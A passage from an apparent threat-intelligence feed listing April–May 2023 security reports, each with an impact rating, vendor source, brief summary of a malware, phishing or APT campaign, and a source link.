Quick Heal analysts went through the recent advisory published by the Indian Railway Catering and Tourism Corporation (IRCTC) about fake IRCTC apps. The fake IRCTC app pretends to be the real IRCTC app but is in reality full-fledged spyware that spies on victims with ease.
Source: https://blogs.quickheal.com/beware-fake-applications-are-disguised-as-legitimate-ones/
2023-05-09
Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
LOW
Intel Source:
Cofense
Intel Name:
Microsoft_Phish_Redirects_Victims_to_Catering_Voice_Recording
Date of Scan:
2023-05-09
Impact:
LOW
Summary:
Cofense researchers have observed credential phishing campaigns that use a novel deception technique, luring unsuspecting users into a false sense of security after they’ve given away their Microsoft login information.
Source: https://cofense.com/blog/the-art-of-deception-microsoft-phish-redirects-victims-to-a-catering-voice-recording/
2023-05-09
AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
LOW
Intel Source:
Fortinet
Intel Name:
AndoryuBot_Targeting_Ruckus_Wireless_Admin_Remote_Code_Execution_Vulnerability
Date of Scan:
2023-05-09
Impact:
LOW
Summary:
FortiGuard Labs researchers have observed a unique botnet based on the SOCKS protocol distributed through the Ruckus vulnerability (CVE-2023-25717). It contains DDoS attack modules for different protocols and communicates with its command-and-control server using SOCKS5 proxies.
Source: https://www.fortinet.com/blog/threat-research/andoryubot-new-botnet-campaign-targets-ruckus-wireless-admin-remote-code-execution-vulnerability-cve-2023-25717?&web_view=true
2023-05-08
RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
LOW
Intel Source:
ASEC
Intel Name:
RecordBreaker_Stealer_Distributed_by_YouTube_Accounts
Date of Scan:
2023-05-08
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of RecordBreaker through a YouTube account that is assumed to have been recently hacked. RecordBreaker is a new infostealer version of Raccoon Stealer. It disguises itself as a software installer, similar to CryptBot, RedLine, and Vidar.
Source: https://asec.ahnlab.com/en/52072/
2023-05-08
SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
MEDIUM
Intel Source:
CERT-UA
Intel Name:
SmokeLoader_and_RoarBAT_Malware_Attacks_Against_Ukraine
Date of Scan:
2023-05-08
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified an ongoing phishing campaign with invoice-themed lures being used to distribute the SmokeLoader malware in the form of a polyglot file.
Source: https://cert.gov.ua/article/4555802
2023-05-08
US_Job_Services_Leaks_Customer_Data
LOW
Intel Source:
KrebsonSecurity
Intel Name:
US_Job_Services_Leaks_Customer_Data
Date of Scan:
2023-05-08
Impact:
LOW
Summary:
Researchers from KrebsonSecurity have identified a huge tranche of full credit card records exposed online, and that at first glance the domain names involved appeared to be affiliated with the United States Postal Service.
Source: https://krebsonsecurity.com/2023/05/promising-jobs-at-the-u-s-postal-service-us-job-services-leaks-customer-data/?replytocom=583725
2023-05-08
New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
MEDIUM
Intel Source:
Cleafy
Intel Name:
New_Web_Injection_Toolkit_DrIBAN_Targeting_Italian_Corporate_Banking_Clients
Date of Scan:
2023-05-08
Impact:
MEDIUM
Summary:
Researchers from Cleafy have observed that Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.
Source: https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter1
2023-05-08
New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
LOW
Intel Source:
McAfee
Intel Name:
New_MultiStage_Attack_and_Malware_Distribution_of_Amadey
Date of Scan:
2023-05-08
Impact:
LOW
Summary:
McAfee Labs researchers have identified an increase in Wextract.exe samples that drop a malware payload in multiple stages.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/deconstructing-amadeys-latest-multi-stage-attack-and-malware-distribution/
2023-05-08
Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
LOW
Intel Source:
Cyble
Intel Name:
Phishing_Sites_Spreading_RAT_Called_DarkWatchMan
Date of Scan:
2023-05-08
Impact:
LOW
Summary:
Cyble researchers have identified a phishing website that imitates a renowned Russian website, CryptoPro CSP. TAs are using this website to distribute DarkWatchman malware.
Source: https://blog.cyble.com/2023/05/05/sophisticated-darkwatchman-rat-spreads-through-phishing-sites/
2023-05-08
An_Increase_in_SHTML_Phishing_Attacks
MEDIUM
Intel Source:
McAfee
Intel Name:
An_Increase_in_SHTML_Phishing_Attacks
Date of Scan:
2023-05-08
Impact:
MEDIUM
Summary:
McAfee researchers have observed a new wave of phishing attacks. In this wave, the attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or displaying phishing forms locally within the browser to harvest user-sensitive information.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shtml-phishing-attack-with-blurred-image/
2023-05-08
SideCopy_Group_Delivering_Malware_via_Phishing_Emails
LOW
Intel Source:
Fortinet
Intel Name:
SideCopy_Group_Delivering_Malware_via_Phishing_Emails
Date of Scan:
2023-05-08
Impact:
LOW
Summary:
FortiGuard Labs researchers have identified a file that referenced an Indian state military research organization and an in-development nuclear missile. The file is meant to deploy malware with characteristics matching the APT group SideCopy. With activities dating back to at least 2019, this group has aligned its targeting with the goals and objectives of the Pakistani government.
Source: https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy
2023-05-07
Multiple_Malware_Targeting_Business_Users
LOW
Intel Source:
Meta
Intel Name:
Multiple_Malware_Targeting_Business_Users
Date of Scan:
2023-05-07
Impact:
LOW
Summary:
Researchers from Meta have analyzed the persistent malware campaigns targeting businesses across the internet, including threat indicators to help raise the industry’s collective defenses across the internet.
Source: https://engineering.fb.com/2023/05/03/security/malware-nodestealer-ducktail/
2023-05-07
The_Analysis_of_CrossLock_Ransomware
LOW
Intel Source:
Netskope
Intel Name:
The_Analysis_of_CrossLock_Ransomware
Date of Scan:
2023-05-07
Impact:
LOW
Summary:
Netskope researchers have identified a new ransomware named CrossLock. It emerged in April 2023, targeting a large digital certifier company in Brazil. This ransomware was written in Go, which has also been adopted by other ransomware groups, including Hive, due to the cross-platform capabilities offered by the language.
Source: https://www.netskope.com/blog/netskope-threat-coverage-crosslock-ransomware
2023-05-07
New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
LOW
Intel Source:
Cyble
Intel Name:
New_KEKW_Malware_Variant_Detected_in_PyPI_Packages
Date of Scan:
2023-05-07
Impact:
LOW
Summary:
Cyble researchers have uncovered multiple malicious Python .whl (Wheel) files that are found to be distributing a new malware named ‘KEKW’. KEKW malware can steal sensitive information from infected systems, as well as perform clipper activities which can lead to the hijacking of cryptocurrency transactions.
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/
2023-05-07
DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
LOW
+
Intel Source:
Sophos
Intel Name:
DLL_sideloading_Attacks_Gain_New_Air_With_a_Doubled_Dragon_Breath
Date of Scan:
2023-05-07
Impact:
LOW
Summary:
Sophos researchers have spotted malicious DLL sideloading activity that builds on the classic sideloading scenario but adds complexity and layers to its execution.
Source: https://news.sophos.com/en-us/2023/05/03/doubled-dll-sideloading-dragon-breath/
2023-05-07
Mustang_Panda_New_Campaign_Against_Australia
LOW
+
Intel Source:
Lab52
Intel Name:
Mustang_Panda_New_Campaign_Against_Australia
Date of Scan:
2023-05-07
Impact:
LOW
Summary:
Lab52 researchers have found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.
Source: https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
2023-05-06
The_Second_Variant_of_Atomic_Stealer_macOS_Malware
LOW
+
Intel Source:
SentinelOne
Intel Name:
The_Second_Variant_of_Atomic_Stealer_macOS_Malware
Date of Scan:
2023-05-06
Impact:
LOW
Summary:
The threat actor, however, has been busy looking for other ways to target macOS users with a different version of Atomic Stealer. In this post, we take a closer look at how Atomic Stealer works and describe a previously unreported second variant. We also provide a comprehensive list of indicators to aid threat hunters and security teams defending macOS endpoints.
Source: https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/
2023-05-06
Kimsuky_New_Global_Campaign
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Kimsuky_New_Global_Campaign
Date of Scan:
2023-05-06
Impact:
MEDIUM
Summary:
SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe. Ongoing campaigns use a new malware component called ReconShark, which is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros. ReconShark operates as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a broader set of activity attributed to North Korea.
Source: https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/
2023-05-06
BlackBit_Ransomware
MEDIUM
+
Intel Source:
Cyble
Intel Name:
BlackBit_Ransomware
Date of Scan:
2023-05-06
Impact:
MEDIUM
Summary:
AhnLab shared its analysis of BlackBit ransomware, which is being distributed in Korea. BlackBit ransomware is a LokiLocker ransomware variant based on the RaaS model. The source code of BlackBit shows the ransomware is a copy of LokiLocker with some changes such as icons, name, and color scheme. BlackBit is a sophisticated ransomware with several capabilities to establish persistence, evade defenses, and impair recovery.
Source: https://blog.cyble.com/2023/05/03/blackbit-ransomware-a-threat-from-the-shadows-of-lokilocker/
2023-05-06
Infostealer_Embedded_in_a_Word_Document
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Infostealer_Embedded_in_a_Word_Document
Date of Scan:
2023-05-06
Impact:
LOW
Summary:
Researchers from SANS have analyzed a malicious Word document that carries its payload as an embedded object.
Source: https://isc.sans.edu/diary/Infostealer+Embedded+in+a+Word+Document/29810/
2023-05-06
Raspberry_Robin_USB_malware_campaign
LOW
+
Intel Source:
Bushidotoken
Intel Name:
Raspberry_Robin_USB_malware_campaign
Date of Scan:
2023-05-06
Impact:
LOW
Summary:
The Bushidotoken blog shares technical details about this malware and analyses how it runs and works, the commands it executes, the processes it uses, and, in this case, what its C2 communications look like.
Source: https://blog.bushidotoken.net/2023/05/raspberry-robin-global-usb-malware.html
2023-05-05
Malware_IcedID_information_stealer_configuration_analyses
LOW
+
Intel Source:
PaloAlto
Intel Name:
Malware_IcedID_information_stealer_configuration_analyses
Date of Scan:
2023-05-05
Impact:
LOW
Summary:
Palo Alto researchers shared an example of an IcedID malware (information stealer) configuration, how it was obfuscated and how they extracted it, using one IcedID binary to show how its configuration is encrypted.
Source: https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing/
2023-05-05
Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
LOW
+
Intel Source:
Eclecticiq
Intel Name:
Vidar_Infostealer_targeted_a_Polish_Healthcare_Industry
Date of Scan:
2023-05-05
Impact:
LOW
Summary:
EclecticIQ researchers have observed a spearphishing email targeting the healthcare industry in Poland. The spoofed email looked as if it had really been sent from a Polish government entity and contained an infected Microsoft Excel XLL attachment that can download and execute the Vidar infostealer malware.
Source: https://blog.eclecticiq.com/polish-healthcare-industry-targeted-by-vidar-infostealer-likely-linked-to-djvu-ransomware
2023-05-05
Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Destructive_cyberattack_UAC_0165_on_the_public_sector_of_Ukraine_using_RoarBat
Date of Scan:
2023-05-05
Impact:
MEDIUM
Summary:
Upon receiving information about interference in the information and communication system (ICS) of one of the state organizations of Ukraine, measures to investigate a cyber attack were initiated. It was found that the performance of electronic computing machines (server equipment, automated user workstations, data storage systems) was impaired as a result of the destructive influence carried out using the appropriate software.
Source: https://cert.gov.ua/article/4501891
2023-05-04
Earth_Longzhi_is_Back_With_New_Technique
LOW
+
Intel Source:
TrendMicro
Intel Name:
Earth_Longzhi_is_Back_With_New_Technique
Date of Scan:
2023-05-04
Impact:
LOW
Summary:
TrendMicro researchers have discovered a new campaign by Earth Longzhi that is targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji. The recent campaign, which follows months of dormancy, abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard64.sys, to disable security products installed on the hosts via a bring-your-own-vulnerable-driver (BYOVD) attack.
Source: https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html
2023-05-04
The_Investigation_of_BRAINSTORM_and_RILIDE
LOW
+
Intel Source:
Mandiant
Intel Name:
The_Investigation_of_BRAINSTORM_and_RILIDE
Date of Scan:
2023-05-04
Impact:
LOW
Summary:
Mandiant researchers have identified BRAINSTORM, a Rust-based dropper, which ultimately led to RILIDE, a Chromium-based extension first publicly reported by SpiderLabs. Careful investigation identified that the email and cryptocurrency theft ecosystem of RILIDE is larger than reported.
Source: https://www.mandiant.com/resources/blog/lnk-between-browsers
2023-05-04
North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
LOW
+
Intel Source:
Checkpoint
Intel Name:
North_Korean_Group_ScarCruft_Deploying_RokRAT_Malware
Date of Scan:
2023-05-04
Impact:
LOW
Summary:
Checkpoint researchers have identified that the North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
Source: https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/
2023-05-03
Diving_Deep_into_BlackByte_Ransomware
LOW
+
Intel Source:
SocRadar
Intel Name:
Diving_Deep_into_BlackByte_Ransomware
Date of Scan:
2023-05-03
Impact:
LOW
Summary:
Researchers from SOCRadar have analyzed the BlackByte ransomware. It is a ransomware operation that began targeting corporate victims worldwide in July 2021. The first findings regarding the group emerged after victims sought help decrypting their files.
Source: https://socradar.io/dark-web-profile-blackbyte-ransomware/
2023-05-03
Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
MEDIUM
+
Intel Source:
Prodaft
Intel Name:
Russian_APT_Hacked_Tajikistani_Carrier_to_Spy_on_Government_and_Public_Services
Date of Scan:
2023-05-03
Impact:
MEDIUM
Summary:
Researchers from Prodaft have observed a Russian espionage group tracked as Nomadic Octopus spying on Tajikistan’s high-ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Source: https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf
2023-05-03
Malware_Families_Leveraging_AresLoader_for_Distribution
LOW
+
Intel Source:
Cyble
Intel Name:
Malware_Families_Leveraging_AresLoader_for_Distribution
Date of Scan:
2023-05-03
Impact:
LOW
Summary:
Cyble researchers have observed a new loader called AresLoader that is used to spread several types of malware families. It is a loader malware written in the C programming language that first emerged in cybercrime forums and Telegram channels in 2022.
Source: https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/
2023-05-03
Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
LOW
+
Intel Source:
PaloAlto
Intel Name:
Internet_Threats_Are_Impersonating_Common_Industries_via_Phishing_Attacks_Web_Skimmer_Analysis_and_Many_More
Date of Scan:
2023-05-03
Impact:
LOW
Summary:
PaloAlto researchers have observed the internet threat landscape and analyzed malicious URL distribution, geolocation, category analysis, and statistics describing attempted malware attacks. Also, this includes industry sectors being targeted for spoofing in phishing pages, as well as downloaded malware statistics, injected JavaScript malware analysis, and malicious DNS analysis.
Source: https://unit42.paloaltonetworks.com/internet-threats-late-2022/
2023-05-03
CoinMiner_Distributing_to_Linux_SSH_Servers
LOW
+
Intel Source:
ASEC
Intel Name:
CoinMiner_Distributing_to_Linux_SSH_Servers
Date of Scan:
2023-05-03
Impact:
LOW
Summary:
ASEC researchers have discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022; they involve the use of malware developed with Shell Script Compiler when installing XMRig, as well as the creation of a backdoor SSH account.
Source: https://asec.ahnlab.com/en/51908/
2023-05-01
Ransomware_Family_Rapture_is_Similar_to_Paradise
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Ransomware_Family_Rapture_is_Similar_to_Paradise
Date of Scan:
2023-05-01
Impact:
MEDIUM
Summary:
TrendMicro researchers have observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. The findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.
Source: https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html
2023-05-01
The_Unstoppable_Malverposting_Continues
LOW
+
Intel Source:
Guardio
Intel Name:
The_Unstoppable_Malverposting_Continues
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
In this post Guardio researchers share the large number of IOC detections for malverposting, along with a detailed analysis of one campaign that uses adult-rated clickbait to deliver sophisticated malware, making it harder to detect and easy to mass propagate.
Source: https://labs.guard.io/malverposting-with-over-500k-estimated-infections-facebook-ads-fuel-this-evolving-stealer-54b03d24b349
2023-05-01
New_LOBSHOT_Malware_Deploying_Via_Google_Ads
LOW
+
Intel Source:
Elastic
Intel Name:
New_LOBSHOT_Malware_Deploying_Via_Google_Ads
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
Researchers from Elastic Security Labs have observed one malware family called LOBSHOT. It continues to collect victims while remaining undetected. Also, the infrastructure belongs to TA505, the well-known cybercriminal group associated with Dridex, Locky, and Necurs campaigns.
Source: https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware
2023-05-01
ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
LOW
+
Intel Name:
ASEC_Weekly_Phishing_Email_analyses_April_9_15th_2023
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of distribution of phishing emails during the week from April 9th, 2023 to April 15th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/51821/
2023-05-01
ASEC_Weekly_Malware_Statistics
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_Statistics
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from November 21st, 2022 (Monday) to November 27th (Sunday).
Source: https://asec.ahnlab.com/en/43255/
2023-05-01
The_Overview_of_UNIZA_Ransomware
LOW
+
Intel Source:
Fortinet
Intel Name:
The_Overview_of_UNIZA_Ransomware
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
Fortinet researchers have discovered a new ransomware variant called UNIZA. Like other ransomware variants, it uses the Command Prompt (cmd.exe) window to display its ransom message, and interestingly, it does not append an extension to the filename of the files it encrypts, making it more difficult to determine which files have been impacted.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-uniza-coverage
2023-05-01
A_malicious_Mitiga_document
LOW
+
Intel Source:
Mitiga
Intel Name:
A_malicious_Mitiga_document
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
Last January, an attacker uploaded a malicious .docx file to VirusTotal. He used several of Mitiga's publicly available branding elements, including its logo, fonts and colors, to lend credibility to the document.
Source: https://www.mitiga.io/blog/mitiga-advisory-virus-total
2023-05-01
Threat_Actors_Leveraging_SEO_Poisoning
LOW
+
Intel Source:
Trellix
Intel Name:
Threat_Actors_Leveraging_SEO_Poisoning
Date of Scan:
2023-05-01
Impact:
LOW
Summary:
Trellix researchers have identified that hackers continue to innovate their techniques to infect victims, with SEO poisoning being one of the recent trends.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/no-more-macros-better-watch-your-search-results.html
2023-04-30
An_Ongoing_Magecart_Campaign
LOW
+
Intel Source:
Malwarebytes
Intel Name:
An_Ongoing_Magecart_Campaign
Date of Scan:
2023-04-30
Impact:
LOW
Summary:
Malwarebytes researchers have identified an ongoing Magecart campaign that is leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
2023-04-30
Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Hackers_From_APT28_Group_Distributing_Emails_With_Instructions_on_Updating_OS
Date of Scan:
2023-04-30
Impact:
MEDIUM
Summary:
CERT-UA researchers have observed the distribution of emails with the subject "Windows Update", allegedly sent on behalf of the system administrators of departments. The senders' email addresses, created on the public @outlook.com service, can be formed using the real name and initials of the employee.
Source: https://cert.gov.ua/article/4492467
2023-04-27
APT_Group_Panda_Delivering_Malware_via_Software_Updates
HIGH
+
Intel Source:
Welivesecurity
Intel Name:
APT_Group_Panda_Delivering_Malware_via_Software_Updates
Date of Scan:
2023-04-27
Impact:
HIGH
Summary:
ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.
Source: https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/
2023-04-27
TrafficStealer_Abusing_Open_Container_APIs
LOW
+
Intel Source:
TrendMicro
Intel Name:
TrafficStealer_Abusing_Open_Container_APIs
Date of Scan:
2023-04-27
Impact:
LOW
Summary:
Researchers from TrendMicro have discovered a different type of attack: a piece of software that leverages Docker containers to generate money through monetized traffic. Although the software itself appears to be legitimate, it likely has compromised components, which result in it being monitored as a potentially unwanted application.
Source: https://www.trendmicro.com/en_us/research/23/d/attackers-use-containers-for-profit-via-trafficstealer.html
2023-04-27
RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
LOW
+
Intel Source:
Uptycs
Intel Name:
RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
Date of Scan:
2023-04-27
Impact:
LOW
Summary:
Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware's leaked source code.
Source: https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux
2023-04-27
Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
Date of Scan:
2023-04-27
Impact:
MEDIUM
Summary:
Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
Source: https://blog.sekoia.io/unveiling-of-a-large-resilient-infrastructure-distributing-information-stealers/
2023-04-27
Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
LOW
+
Intel Source:
Cyble
Intel Name:
Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
Date of Scan:
2023-04-27
Impact:
LOW
Summary:
Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.
Source: https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
2023-04-27
The_Exploiting_of_Kubernetes_RBAC_by_attackers
LOW
+
Intel Source:
Aqua
Intel Name:
The_Exploiting_of_Kubernetes_RBAC_by_attackers
Date of Scan:
2023-04-27
Impact:
LOW
Summary:
Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also tried to launch DaemonSets to take control of and seize resources from the K8s clusters they attack. Aqua's analysis suggests that this campaign is actively targeting at least 60 clusters in the wild.
Source: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
2023-04-27
PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
LOW
+
Intel Source:
PaloAlto
Intel Name:
PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
Date of Scan:
2023-04-27
Impact:
LOW
Summary:
Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.
Source: https://unit42.paloaltonetworks.com/alloy-taurus/
2023-04-27
The_BellaCiao_Malware_of_Iran
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
The_BellaCiao_Malware_of_Iran
Date of Scan:
2023-04-27
Impact:
MEDIUM
Summary:
Bitdefender researchers have observed the modernization of Charming Kitten's tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.
Source: https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware
2023-04-27
PaperCut_actively_exploited_in_the_Wild
MEDIUM
+
Intel Source:
Cyble
Intel Name:
PaperCut_actively_exploited_in_the_Wild
Date of Scan:
2023-04-27
Impact:
MEDIUM
Summary:
Earlier this month, PaperCut shared a security alert stating that they have evidence that unpatched servers are being exploited in the wild. A Russian hacker is suspected of exploiting the PaperCut vulnerability. The advisories provided by vendors shared insights into the two CVEs: CVE-2023-27350 (Severity: Critical) and CVE-2023-27351 (Severity: High). Cyble researchers shared their details on the same in their post.
Source: https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/
2023-04-26
RokRAT_Malware_Distributing_Through_LNK_Files
LOW
+
Intel Source:
ASEC
Intel Name:
RokRAT_Malware_Distributing_Through_LNK_Files
Date of Scan:
2023-04-26
Impact:
LOW
Summary:
ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.
Source: https://asec.ahnlab.com/en/51751/
2023-04-26
Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
LOW
+
Intel Source:
Infoblox
Intel Name:
Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
Date of Scan:
2023-04-26
Impact:
LOW
Summary:
Researchers from Infoblox have identified a new malware toolkit named Decoy Dog that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging techniques to bypass security checks.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/cyber-threat-advisory/dog-hunt-finding-decoy-dog-toolkit-via-anomalous-dns-traffic/
2023-04-26
Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
Date of Scan:
2023-04-26
Impact:
LOW
Summary:
Researchers from SANS have identified an IRAS phishing website that looks legitimate. The website asks users to input their Singapore Personal Access (Singpass) credentials, which are used to access government and private services (such as banking) in Singapore.
Source: https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/
2023-04-26
New_the_Mirai_botnet_exploit
MEDIUM
+
Intel Source:
Zero Day Initiative (ZDI)
Intel Name:
New_the_Mirai_botnet_exploit
Date of Scan:
2023-04-26
Impact:
MEDIUM
Summary:
The Zero Day Initiative threat-hunting team recently discovered new exploit attempts in Eastern Europe showing that the Mirai botnet has added CVE-2023-1389, known as ZDI-CAN-19557/ZDI-23-451, to its arsenal. This vulnerability in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
Source: https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
2023-04-26
Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
LOW
+
Intel Source:
ASEC
Intel Name:
Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
Date of Scan:
2023-04-26
Impact:
LOW
Summary:
Researchers from ASEC have identified that the Tonto Team threat group is targeting mainly Asian countries and has been distributing Bisonal malware.
Source: https://asec.ahnlab.com/en/51746/
2023-04-25
The_Analysis_of_Tomiris_Group
LOW
+
Intel Source:
Securelist
Intel Name:
The_Analysis_of_Tomiris_Group
Date of Scan:
2023-04-25
Impact:
LOW
Summary:
Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023, which target government and diplomatic entities in the CIS.
Source: https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
2023-04-25
New_Findings_of_Educated_Manticore
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
New_Findings_of_Educated_Manticore
Date of Scan:
2023-04-25
Impact:
MEDIUM
Summary:
Researchers from Checkpoint have revealed new findings on an activity cluster closely related to Phosphorus. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant was attributed in the past to Phosphorus, an Iran-affiliated threat group operating in the Middle East and North America.
Source: https://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/
2023-04-25
Repurposing_Package_Name_on_PyPI_to_Push_Malware
LOW
+
Intel Source:
ReversingLabs
Intel Name:
Repurposing_Package_Name_on_PyPI_to_Push_Malware
Date of Scan:
2023-04-25
Impact:
LOW
Summary:
Researchers from ReversingLabs have observed a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.
Source: https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi
2023-04-25
After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
LOW
+
Intel Source:
Cofense
Intel Name:
After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
Date of Scan:
2023-04-25
Impact:
